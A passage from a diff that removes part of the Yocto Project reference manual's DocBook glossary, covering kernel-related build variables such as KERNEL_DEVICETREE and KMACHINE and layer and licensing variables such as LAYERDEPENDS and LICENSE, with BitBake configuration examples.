-                KERNEL_CLASSES[doc] = "A list of classes defining kernel image types that kernel class should inherit."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of classes defining kernel image types that the
-                    <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
-                    class should inherit.
-                    You typically append this variable to enable extended image
-                    types.
-                    An example is the "kernel-fitimage", which enables
-                    fitImage support and resides in
-                    <filename>meta/classes/kernel-fitimage.bbclass</filename>.
-                    You can register custom kernel image types with the
-                    <filename>kernel</filename> class using this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_DEVICETREE'><glossterm>KERNEL_DEVICETREE</glossterm>
-            <info>
-                KERNEL_DEVICETREE[doc] = "Specifies the name of the generated Linux kernel device tree (i.e. the .dtb) file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of the generated Linux kernel device tree
-                    (i.e. the <filename>.dtb</filename>) file.
-                    <note>
-                        Legacy support exists for specifying the full path
-                        to the device tree.
-                        However, providing just the <filename>.dtb</filename>
-                        file is preferred.
-                    </note>
-                    In order to use this variable, the
-                    <link linkend='ref-classes-kernel-devicetree'><filename>kernel-devicetree</filename></link>
-                    class must be inherited.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_DTB_LINK_NAME'><glossterm>KERNEL_DTB_LINK_NAME</glossterm>
-            <info>
-                KERNEL_DTB_LINK_NAME[doc] = "The link name of the kernel device tree binary (DTB)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The link name of the kernel device tree binary (DTB).
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_DTB_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
-                    </literallayout>
-                    The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    variable for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_DTB_NAME'><glossterm>KERNEL_DTB_NAME</glossterm>
-            <info>
-                KERNEL_DTB_NAME[doc] = "The base name of the kernel device tree binary (DTB)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name of the kernel device tree binary (DTB).
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_DTB_NAME ?= "${KERNEL_ARTIFACT_NAME}"
-                    </literallayout>
-                    The value of the
-                    <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_EXTRA_ARGS'><glossterm>KERNEL_EXTRA_ARGS</glossterm>
-            <info>
-                KERNEL_EXTRA_ARGS[doc] = "Specifies additional make command-line arguments the OpenEmbedded build system passes on when compiling the kernel."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies additional <filename>make</filename>
-                    command-line arguments the OpenEmbedded build system
-                    passes on when compiling the kernel.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_FEATURES'><glossterm>KERNEL_FEATURES</glossterm>
-            <info>
-                KERNEL_FEATURES[doc] = "Includes additional kernel metadata. The metadata you add through this variable includes config fragments and features descriptions."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Includes additional kernel metadata.
-                    In the OpenEmbedded build system, the default Board Support
-                    Packages (BSPs)
-                    <link linkend='metadata'>Metadata</link>
-                    is provided through
-                    the <link linkend='var-KMACHINE'><filename>KMACHINE</filename></link>
-                    and
-                    <link linkend='var-KBRANCH'><filename>KBRANCH</filename></link>
-                    variables.
-                    You can use the <filename>KERNEL_FEATURES</filename>
-                    variable from within the kernel recipe or kernel append
-                    file to further add metadata for all BSPs or specific
-                    BSPs.
-                </para>
-
-                <para>
-                    The metadata you add through this variable includes config
-                    fragments and features descriptions,
-                    which usually includes patches as well as config fragments.
-                    You typically override the
-                    <filename>KERNEL_FEATURES</filename> variable for a
-                    specific machine.
-                    In this way, you can provide validated, but optional,
-                    sets of kernel configurations and features.
-                </para>
-
-                <para>
-                    For example, the following example from the
-                    <filename>linux-yocto-rt_4.12</filename> kernel recipe
-                    adds "netfilter" and "taskstats" features to all BSPs
-                    as well as "virtio" configurations to all QEMU machines.
-                    The last two statements add specific configurations to
-                    targeted machine types:
-                    <literallayout class='monospaced'>
-     KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc"
-     KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
-     KERNEL_FEATURES_append_qemuall = " cfg/virtio.scc"
-     KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc"
-     KERNEL_FEATURES_append_qemux86-64 = " cfg/sound.scc"                    </literallayout></para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_FIT_LINK_NAME'><glossterm>KERNEL_FIT_LINK_NAME</glossterm>
-            <info>
-                KERNEL_FIT_LINK_NAME[doc] = "The link name of the kernel flattened image tree (FIT) image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The link name of the kernel flattened image tree (FIT) image.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_FIT_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
-                    </literallayout>
-                    The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    variable for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_FIT_NAME'><glossterm>KERNEL_FIT_NAME</glossterm>
-            <info>
-                KERNEL_FIT_NAME[doc] = "The base name of the kernel flattened image tree (FIT) image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name of the kernel flattened image tree (FIT) image.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_FIT_NAME ?= "${KERNEL_ARTIFACT_NAME}"
-                    </literallayout>
-                    The value of the
-                    <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_IMAGE_LINK_NAME'><glossterm>KERNEL_IMAGE_LINK_NAME</glossterm>
-            <info>
-                KERNEL_IMAGE_LINK_NAME[doc] = "The link name for the kernel image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The link name for the kernel image.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_IMAGE_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
-                    </literallayout>
-                    The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    variable for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_IMAGE_MAXSIZE'><glossterm>KERNEL_IMAGE_MAXSIZE</glossterm>
-            <info>
-                KERNEL_IMAGE_MAXSIZE[doc] = "The maximum allowable size in kilobytes of the kernel image file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the maximum size of the kernel image file in
-                    kilobytes.
-                    If <filename>KERNEL_IMAGE_MAXSIZE</filename> is set,
-                    the size of the kernel image file is checked against
-                    the set value during the
-                    <link linkend='ref-tasks-sizecheck'><filename>do_sizecheck</filename></link>
-                    task.
-                    The task fails if the kernel image file is larger than
-                    the setting.
-                </para>
-
-                <para>
-                    <filename>KERNEL_IMAGE_MAXSIZE</filename> is useful for
-                    target devices that have a limited amount of space in
-                    which the kernel image must be stored.
-                </para>
-
-                <para>
-                    By default, this variable is not set, which means the
-                    size of the kernel image is not checked.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_IMAGE_NAME'><glossterm>KERNEL_IMAGE_NAME</glossterm>
-            <info>
-                KERNEL_IMAGE_NAME[doc] = "The base name of the kernel image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name of the kernel image.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_IMAGE_NAME ?= "${KERNEL_ARTIFACT_NAME}"
-                    </literallayout>
-                    The value of the
-                    <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_IMAGETYPE'><glossterm>KERNEL_IMAGETYPE</glossterm>
-            <info>
-                KERNEL_IMAGETYPE[doc] = "The type of kernel to build for a device, usually set by the machine configuration files and defaults to 'zImage'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The type of kernel to build for a device, usually set by the
-                    machine configuration files and defaults to "zImage".
-                    This variable is used
-                    when building the kernel and is passed to <filename>make</filename> as the target to
-                    build.
-                </para>
-
-                <para>
-                    If you want to build an alternate kernel image type, use the
-                    <link linkend='var-KERNEL_ALT_IMAGETYPE'><filename>KERNEL_ALT_IMAGETYPE</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_MODULE_AUTOLOAD'><glossterm>KERNEL_MODULE_AUTOLOAD</glossterm>
-            <info>
-                KERNEL_MODULE_AUTOLOAD[doc] = "Lists kernel modules that need to be auto-loaded during boot"
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists kernel modules that need to be auto-loaded during
-                    boot.
-                    <note>
-                        This variable replaces the deprecated
-                        <link linkend='var-module_autoload'><filename>module_autoload</filename></link>
-                        variable.
-                    </note>
-                </para>
-
-                <para>
-                    You can use the <filename>KERNEL_MODULE_AUTOLOAD</filename>
-                    variable anywhere that it can be
-                    recognized by the kernel recipe or by an out-of-tree kernel
-                    module recipe (e.g. a machine configuration file, a
-                    distribution configuration file, an append file for the
-                    recipe, or the recipe itself).
-                </para>
-
-                <para>
-                    Specify it as follows:
-                    <literallayout class='monospaced'>
-     KERNEL_MODULE_AUTOLOAD += "<replaceable>module_name1</replaceable> <replaceable>module_name2</replaceable> <replaceable>module_name3</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Including <filename>KERNEL_MODULE_AUTOLOAD</filename> causes
-                    the OpenEmbedded build system to populate the
-                    <filename>/etc/modules-load.d/modname.conf</filename>
-                    file with the list of modules to be auto-loaded on boot.
-                    The modules appear one-per-line in the file.
-                    Here is an example of the most common use case:
-                    <literallayout class='monospaced'>
-     KERNEL_MODULE_AUTOLOAD += "<replaceable>module_name</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on how to populate the
-                    <filename>modname.conf</filename> file with
-                    <filename>modprobe.d</filename> syntax lines, see the
-                    <link linkend='var-KERNEL_MODULE_PROBECONF'><filename>KERNEL_MODULE_PROBECONF</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_MODULE_PROBECONF'><glossterm>KERNEL_MODULE_PROBECONF</glossterm>
-            <info>
-                KERNEL_MODULE_PROBECONF[doc] = "Lists kernel modules for which the build system expects to find module_conf_* values that specify configuration for each of the modules."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Provides a list of modules for which the OpenEmbedded
-                    build system expects to find
-                    <filename>module_conf_</filename><replaceable>modname</replaceable>
-                    values that specify configuration for each of the modules.
-                    For information on how to provide those module
-                    configurations, see the
-                    <link linkend='var-module_conf'><filename>module_conf_*</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_PATH'><glossterm>KERNEL_PATH</glossterm>
-            <info>
-                KERNEL_PATH[doc] = "The location of the kernel sources. This variable is set to the value of the STAGING_KERNEL_DIR within the module class (module.bbclass)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location of the kernel sources.
-                    This variable is set to the value of the
-                    <link linkend='var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></link>
-                    within the
-                    <link linkend='ref-classes-module'><filename>module</filename></link>
-                    class.
-                    For information on how this variable is used, see the
-                    "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</ulink>"
-                    section in the Yocto Project Linux Kernel Development
-                    Manual.
-                </para>
-
-                <para>
-                    To help maximize compatibility with out-of-tree drivers
-                    used to build modules, the OpenEmbedded build system also
-                    recognizes and uses the
-                    <link linkend='var-KERNEL_SRC'><filename>KERNEL_SRC</filename></link>
-                    variable, which is identical to the
-                    <filename>KERNEL_PATH</filename> variable.
-                    Both variables are common variables used by external
-                    Makefiles to point to the kernel source directory.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_SRC'><glossterm>KERNEL_SRC</glossterm>
-            <info>
-                KERNEL_SRC[doc] = "The location of the kernel sources. This variable is set to the value of the STAGING_KERNEL_DIR within the module class (module.bbclass)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location of the kernel sources.
-                    This variable is set to the value of the
-                    <link linkend='var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></link>
-                    within the
-                    <link linkend='ref-classes-module'><filename>module</filename></link>
-                    class.
-                    For information on how this variable is used, see the
-                    "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</ulink>"
-                    section in the Yocto Project Linux Kernel Development
-                    Manual.
-                </para>
-
-                <para>
-                    To help maximize compatibility with out-of-tree drivers
-                    used to build modules, the OpenEmbedded build system also
-                    recognizes and uses the
-                    <link linkend='var-KERNEL_PATH'><filename>KERNEL_PATH</filename></link>
-                    variable, which is identical to the
-                    <filename>KERNEL_SRC</filename> variable.
-                    Both variables are common variables used by external
-                    Makefiles to point to the kernel source directory.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNEL_VERSION'><glossterm>KERNEL_VERSION</glossterm>
-            <info>
-                KERNEL_VERSION[doc] = "Specifies the version of the kernel as extracted from version.h or utsrelease.h within the kernel sources."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the version of the kernel as extracted from
-                    <filename>version.h</filename> or
-                    <filename>utsrelease.h</filename> within the kernel sources.
-                    Effects of setting this variable do not take affect until
-                    the kernel has been configured.
-                    Consequently, attempting to refer to this variable in
-                    contexts prior to configuration will not work.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KERNELDEPMODDEPEND'><glossterm>KERNELDEPMODDEPEND</glossterm>
-            <info>
-                KERNELDEPMODDEPEND[doc] = "Specifies whether or not to use the data referenced through the PKGDATA_DIR directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies whether the data referenced through
-                    <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
-                    is needed or not.
-                    The <filename>KERNELDEPMODDEPEND</filename> does not
-                    control whether or not that data exists,
-                    but simply whether or not it is used.
-                    If you do not need to use the data, set the
-                    <filename>KERNELDEPMODDEPEND</filename> variable in your
-                    <filename>initramfs</filename> recipe.
-                    Setting the variable there when the data is not needed
-                    avoids a potential dependency loop.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KFEATURE_DESCRIPTION'><glossterm>KFEATURE_DESCRIPTION</glossterm>
-            <info>
-                KFEATURE_DESCRIPTION[doc] = "Provides a short description of a configuration fragment. You use this variable in the .scc file that describes a configuration fragment file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Provides a short description of a configuration fragment.
-                    You use this variable in the <filename>.scc</filename>
-                    file that describes a configuration fragment file.
-                    Here is the variable used in a file named
-                    <filename>smp.scc</filename> to describe SMP being
-                    enabled:
-                    <literallayout class='monospaced'>
-     define KFEATURE_DESCRIPTION "Enable SMP"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KMACHINE'><glossterm>KMACHINE</glossterm>
-            <info>
-                KMACHINE[doc] = "The machine as known by the kernel."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The machine as known by the kernel.
-                    Sometimes the machine name used by the kernel does not
-                    match the machine name used by the OpenEmbedded build
-                    system.
-                    For example, the machine name that the OpenEmbedded build
-                    system understands as
-                    <filename>core2-32-intel-common</filename> goes by a
-                    different name in the Linux Yocto kernel.
-                    The kernel understands that machine as
-                    <filename>intel-core2-32</filename>.
-                    For cases like these, the <filename>KMACHINE</filename>
-                    variable maps the kernel machine name to the OpenEmbedded
-                    build system machine name.
-                </para>
-
-                <para>
-                    These mappings between different names occur in the
-                    Yocto Linux Kernel's <filename>meta</filename> branch.
-                    As an example take a look in the
-                    <filename>common/recipes-kernel/linux/linux-yocto_3.19.bbappend</filename>
-                    file:
-                    <literallayout class='monospaced'>
-     LINUX_VERSION_core2-32-intel-common = "3.19.0"
-     COMPATIBLE_MACHINE_core2-32-intel-common = "${MACHINE}"
-     SRCREV_meta_core2-32-intel-common = "8897ef68b30e7426bc1d39895e71fb155d694974"
-     SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711"
-     KMACHINE_core2-32-intel-common = "intel-core2-32"
-     KBRANCH_core2-32-intel-common = "standard/base"
-     KERNEL_FEATURES_append_core2-32-intel-common = "${KERNEL_FEATURES_INTEL_COMMON}"
-                    </literallayout>
-                    The <filename>KMACHINE</filename> statement says that
-                    the kernel understands the machine name as
-                    "intel-core2-32".
-                    However, the OpenEmbedded build system understands the
-                    machine as "core2-32-intel-common".
-                </para>
-
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-KTYPE'><glossterm>KTYPE</glossterm>
-            <info>
-                KTYPE[doc] = "Defines the kernel type to be used in assembling the configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the kernel type to be used in assembling the
-                    configuration.
-                    The linux-yocto recipes define "standard", "tiny",
-                    and "preempt-rt" kernel types.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#kernel-types'>Kernel Types</ulink>"
-                    section in the Yocto Project Linux Kernel Development
-                    Manual for more information on kernel types.
-                </para>
-
-                <para>
-                    You define the <filename>KTYPE</filename> variable in the
-                    <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#bsp-descriptions'>BSP Descriptions</ulink>.
-                    The value you use must match the value used for the
-                    <link linkend='var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></link>
-                    value used by the kernel recipe.
-                </para>
-            </glossdef>
-        </glossentry>
-   </glossdiv>
-
-    <glossdiv id='var-glossary-l'><title>L</title>
-
-        <glossentry id='var-LABELS'><glossterm>LABELS</glossterm>
-            <info>
-                LABELS[doc] = "Provides a list of targets for automatic configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Provides a list of targets for automatic configuration.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
-                    class for more information on how this variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LAYERDEPENDS'><glossterm>LAYERDEPENDS</glossterm>
-            <info>
-                LAYERDEPENDS[doc] = "Lists the layers, separated by spaces, on which this recipe depends. This variable is used in the conf/layer.conf file and must be suffixed with the name of the specific layer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists the layers, separated by spaces, on which this
-                    recipe depends.
-                    Optionally, you can specify a specific layer version for a
-                    dependency by adding it to the end of the layer name.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     LAYERDEPENDS_mylayer = "anotherlayer (=3)"
-                    </literallayout>
-                    In this previous example, version 3 of "anotherlayer"
-                    is compared against
-                    <link linkend='var-LAYERVERSION'><filename>LAYERVERSION</filename></link><filename>_anotherlayer</filename>.
-                </para>
-
-                <para>
-                    An error is produced if any dependency is missing or
-                    the version numbers (if specified) do not match exactly.
-                    This variable is used in the
-                    <filename>conf/layer.conf</filename> file and must be
-                    suffixed with the name of the specific layer (e.g.
-                    <filename>LAYERDEPENDS_mylayer</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LAYERDIR'><glossterm>LAYERDIR</glossterm>
-            <info>
-                LAYERDIR[doc] = "When used inside the layer.conf configuration file, this variable provides the path of the current layer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When used inside the <filename>layer.conf</filename> configuration
-                    file, this variable provides the path of the current layer.
-                    This variable is not available outside of <filename>layer.conf</filename>
-                    and references are expanded immediately when parsing of the file completes.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LAYERRECOMMENDS'><glossterm>LAYERRECOMMENDS</glossterm>
-            <info>
-                LAYERRECOMMENDS[doc] = "Lists the layers, separated by spaces, recommended for use with this layer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists the layers, separated by spaces, recommended for
-                    use with this layer.
-                </para>
-
-                <para>
-                    Optionally, you can specify a specific layer version for a
-                    recommendation by adding the version to the end of the
-                    layer name.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     LAYERRECOMMENDS_mylayer = "anotherlayer (=3)"
-                    </literallayout>
-                    In this previous example, version 3 of "anotherlayer" is
-                    compared against
-                    <filename>LAYERVERSION_anotherlayer</filename>.
-                </para>
-
-                <para>
-                    This variable is used in the
-                    <filename>conf/layer.conf</filename> file and must be
-                    suffixed with the name of the specific layer (e.g.
-                    <filename>LAYERRECOMMENDS_mylayer</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LAYERSERIES_COMPAT'><glossterm>LAYERSERIES_COMPAT</glossterm>
-            <info>
-                LAYERSERIES_COMPAT[doc] = "Lists the OpenEmbedded-Core versions for which a layer is compatible."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists the versions of the
-                    <link linkend='oe-core'>OpenEmbedded-Core</link> for which
-                    a layer is compatible.
-                    Using the <filename>LAYERSERIES_COMPAT</filename> variable
-                    allows the layer maintainer to indicate which combinations
-                    of the layer and OE-Core can be expected to work.
-                    The variable gives the system a way to detect when a layer
-                    has not been tested with new releases of OE-Core (e.g.
-                    the layer is not maintained).
-                </para>
-
-                <para>
-                    To specify the OE-Core versions for which a layer is
-                    compatible, use this variable in your layer's
-                    <filename>conf/layer.conf</filename> configuration file.
-                    For the list, use the Yocto Project
-                    <ulink url='https://wiki.yoctoproject.org/wiki/Releases'>Release Name</ulink>
-                    (e.g. &DISTRO_NAME_NO_CAP;).
-                    To specify multiple OE-Core versions for the layer,
-                    use a space-separated list:
-                    <literallayout class='monospaced'>
-     LAYERSERIES_COMPAT_<replaceable>layer_root_name</replaceable> = "&DISTRO_NAME_NO_CAP; &DISTRO_NAME_NO_CAP_MINUS_ONE;"
-                    </literallayout>
-                    <note>
-                        Setting <filename>LAYERSERIES_COMPAT</filename> is
-                        required by the Yocto Project Compatible version 2
-                        standard.
-                        The OpenEmbedded build system produces a warning if
-                        the variable is not set for any given layer.
-                    </note>
-                </para>
-
-                <para>
-                    See the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-your-own-layer'>Creating Your Own Layer</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LAYERVERSION'><glossterm>LAYERVERSION</glossterm>
-            <info>
-                LAYERVERSION[doc] = "Optionally specifies the version of a layer as a single number. This variable is used in the conf/layer.conf file and must be suffixed with the name of the specific layer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Optionally specifies the version of a layer as a single number.
-                    You can use this within
-                    <link linkend='var-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></link>
-                    for another layer in order to depend on a specific version
-                    of the layer.
-                    This variable is used in the <filename>conf/layer.conf</filename> file
-                    and must be suffixed with the name of the specific layer (e.g.
-                    <filename>LAYERVERSION_mylayer</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LD'><glossterm>LD</glossterm>
-            <info>
-                LD[doc] = "Minimal command and arguments to run the linker."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments used to run the
-                    linker.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LDFLAGS'><glossterm>LDFLAGS</glossterm>
-            <info>
-                LDFLAGS[doc] = "Specifies the flags to pass to the linker."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the linker.
-                    This variable is exported to an environment
-                    variable and thus made visible to the software being
-                    built during the compilation step.
-                </para>
-
-                <para>
-                    Default initialization for <filename>LDFLAGS</filename>
-                    varies depending on what is being built:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='var-TARGET_LDFLAGS'><filename>TARGET_LDFLAGS</filename></link>
-                            when building for the target
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILD_LDFLAGS'><filename>BUILD_LDFLAGS</filename></link>
-                            when building for the build host (i.e.
-                            <filename>-native</filename>)
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILDSDK_LDFLAGS'><filename>BUILDSDK_LDFLAGS</filename></link>
-                            when building for an SDK (i.e.
-                            <filename>nativesdk-</filename>)
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LEAD_SONAME'><glossterm>LEAD_SONAME</glossterm>
-            <info>
-                LEAD_SONAME[doc] = "Specifies the lead (or primary) compiled library file (i.e. .so) that the debian class applies its naming policy to given a recipe that packages multiple libraries."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the lead (or primary) compiled library file
-                    (i.e. <filename>.so</filename>) that the
-                    <link linkend='ref-classes-debian'><filename>debian</filename></link>
-                    class applies its naming policy to given a recipe that
-                    packages multiple libraries.
-                </para>
-
-                <para>
-                    This variable works in conjunction with the
-                    <filename>debian</filename> class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LIC_FILES_CHKSUM'><glossterm>LIC_FILES_CHKSUM</glossterm>
-            <info>
-                LIC_FILES_CHKSUM[doc] = "Checksums of the license text in the recipe source code."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Checksums of the license text in the recipe source code.
-                </para>
-
-                <para>
-                    This variable tracks changes in license text of the source
-                    code files.
-                    If the license text is changed, it will trigger a build
-                    failure, which gives the developer an opportunity to review any
-                    license change.
-                </para>
-
-                <para>
-                    This variable must be defined for all recipes (unless
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    is set to "CLOSED").</para>
-                <para>For more information, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-configuring-LIC_FILES_CHKSUM'>Tracking License Changes</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LICENSE'><glossterm>LICENSE</glossterm>
-            <info>
-                LICENSE[doc] = "The list of source licenses for the recipe. The logical operators &amp;, '|', and parentheses can be used."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The list of source licenses for the recipe.
-                    Follow these rules:
-                    <itemizedlist>
-                        <listitem><para>Do not use spaces within individual
-                            license names.</para></listitem>
-                        <listitem><para>Separate license names using
-                            | (pipe) when there is a choice between licenses.
-                            </para></listitem>
-                        <listitem><para>Separate license names using
-                            &amp; (ampersand) when multiple licenses exist
-                            that cover different parts of the source.
-                            </para></listitem>
-                        <listitem><para>You can use spaces between license
-                            names.</para></listitem>
-                        <listitem><para>For standard licenses, use the names
-                            of the files in
-                            <filename>meta/files/common-licenses/</filename>
-                            or the
